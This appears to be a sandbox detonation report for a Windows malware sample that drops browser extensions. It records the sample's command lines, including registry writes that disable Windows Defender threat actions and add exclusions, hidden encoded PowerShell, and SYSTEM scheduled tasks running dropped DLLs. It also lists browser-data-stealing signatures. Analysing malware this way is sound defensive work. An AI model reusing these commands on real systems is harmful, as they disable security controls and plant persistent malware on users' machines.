"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gzQJjWLsT" /SC once /ST 03:00:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gzQJjWLsT"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gzQJjWLsT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "aUYdFpynDtMaquqaO" /SC once /ST 05:36:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe\" F0 /bnsite_idsLW 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "aUYdFpynDtMaquqaO"

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe F0 /bnsite_idsLW 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bEcIFlOHxifjjBuFoU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\ddutGR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yozVwwMRZiDXbVH2" /F /xml "C:\Program Files (x86)\orRvbnhdU\CAwHQVp.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "UQeOhhowVzyRxe" /F /xml "C:\Program Files (x86)\YrliKKkuhgWU2\Sxxhlmi.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "URgAKlFGIJbNQ2" /F /xml "C:\ProgramData\qgjSpVnHOWlNdqVB\ZAcQvcK.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jnXffsNCSkeAQyNEq2" /F /xml "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\yMucUOn.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KAKzgitjhEJqniBRVYG2" /F /xml "C:\Program Files (x86)\ycfBUKIjHxeOC\AUIHvKh.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YGcJOiVocZfwUgdee" /SC once /ST 16:16:36 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lwSRcZKonRlOofsg\EoGhlcSG\dZbEfvp.dll\",#1 /ppsite_idnBO 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YGcJOiVocZfwUgdee"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\EoGhlcSG\dZbEfvp.dll",#1 /ppsite_idnBO 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\EoGhlcSG\dZbEfvp.dll",#1 /ppsite_idnBO 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "aUYdFpynDtMaquqaO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YGcJOiVocZfwUgdee"

Network

Files

C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gndvqefr.fz4.ps1

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

C:\Program Files (x86)\orRvbnhdU\CAwHQVp.xml

C:\Program Files (x86)\YrliKKkuhgWU2\Sxxhlmi.xml

C:\ProgramData\qgjSpVnHOWlNdqVB\ZAcQvcK.xml

C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\yMucUOn.xml

C:\Program Files (x86)\ycfBUKIjHxeOC\AUIHvKh.xml

C:\Windows\Temp\lwSRcZKonRlOofsg\EoGhlcSG\dZbEfvp.dll

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3e5zl51i.default-release\prefs.js

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-07 18:00

Reported

2024-04-07 18:03

Platform

win11-20240221-en

Max time kernel

149s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
